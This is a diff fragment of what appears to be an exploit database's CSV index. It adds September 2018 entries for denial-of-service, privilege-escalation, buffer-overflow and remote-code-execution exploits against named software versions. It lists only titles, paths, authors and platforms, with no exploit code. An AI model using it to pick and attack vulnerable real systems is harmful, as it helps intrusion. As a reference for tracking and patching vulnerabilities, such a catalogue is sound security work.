 45390,exploits/windows/dos/45390.py,"Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows,
 45391,exploits/macos/dos/45391.py,"Apple macOS 10.13.4 - Denial of Service (PoC)",2018-09-12,Sriram,dos,macos,
+45397,exploits/windows_x86/dos/45397.py,"Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)",2018-09-13,ZwX,dos,windows_x86,
+45398,exploits/windows/dos/45398.py,"MediaTek Wirless Utility rt2870 - Denial of Service (PoC)",2018-09-13,"Lawrence Amer",dos,windows,
+45404,exploits/windows_x86-64/dos/45404.py,"TeamViewer App 13.0.100.0 - Denial of Service (PoC)",2018-09-13,"Ali Alipour",dos,windows_x86-64,
+45405,exploits/linux/dos/45405.txt,"Linux 4.18 - Arbitrary Kernel Read into dmesg via Missing Address Check in segfault Handler",2018-09-13,"Google Security Research",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9959,6 +9963,12 @@ id,file,description,date,author,type,platform,port
 45372,exploits/linux/local/45372.txt,"VirtualBox 5.2.6.r120293 - VM Escape",2018-08-28,"Reno Robert",local,linux,
 45378,exploits/windows_x86-64/local/45378.py,"InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)",2018-09-11,"Luis Martínez",local,windows_x86-64,
 45379,exploits/android/local/45379.txt,"Android - 'zygote->init;' Chain from USB Privilege Escalation",2018-09-11,"Google Security Research",local,android,
+45395,exploits/windows_x86-64/local/45395.py,"InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)",2018-09-13,"Luis Martínez",local,windows_x86-64,
+45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation",2018-09-13,"Parvez Anwar",local,windows,
+45402,exploits/windows/local/45402.py,"Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows,
+45403,exploits/windows_x86/local/45403.py,"Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows_x86,
+45406,exploits/windows/local/45406.py,"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow",2018-09-13,ZwX,local,windows,
+45407,exploits/linux/local/45407.txt,"Chrome OS 10820.0.0 dev-channel - app->VM via garcon TCP Command Socket",2018-09-13,"Google Security Research",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39961,5 +39971,7 @@ id,file,description,date,author,type,platform,port
 45386,exploits/windows/webapps/45386.txt,"SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)",2018-09-12,bzyo,webapps,windows,
 45387,exploits/windows/webapps/45387.txt,"SynaMan 4.0 build 1488 - SMTP Credential Disclosure",2018-09-12,bzyo,webapps,windows,
 45392,exploits/php/webapps/45392.txt,"IBM Identity Governance and Intelligence 5.2.3.2 / 5.2.4 - SQL Injection",2018-09-12,"Mohamed Sayed",webapps,php,
-45393,exploits/php/webapps/45393.txt,"MyBB 1.8.17 - Cross-Site Scripting",2018-09-12,0xB9,webapps,php,
+45393,exploits/php/webapps/45393.txt,"MyBB 1.8.17 - Cross-Site Scripting",2018-09-12,0xB9,webapps,php,80
 45394,exploits/hardware/webapps/45394.py,"LG Smart IP Camera 1508190 - Backup File Download",2018-09-12,"Ege Balci",webapps,hardware,
+45396,exploits/windows/webapps/45396.txt,"Apache Portals Pluto 3.0.0 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
+45400,exploits/windows/webapps/45400.txt,"Apache Syncope 2.0.7 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,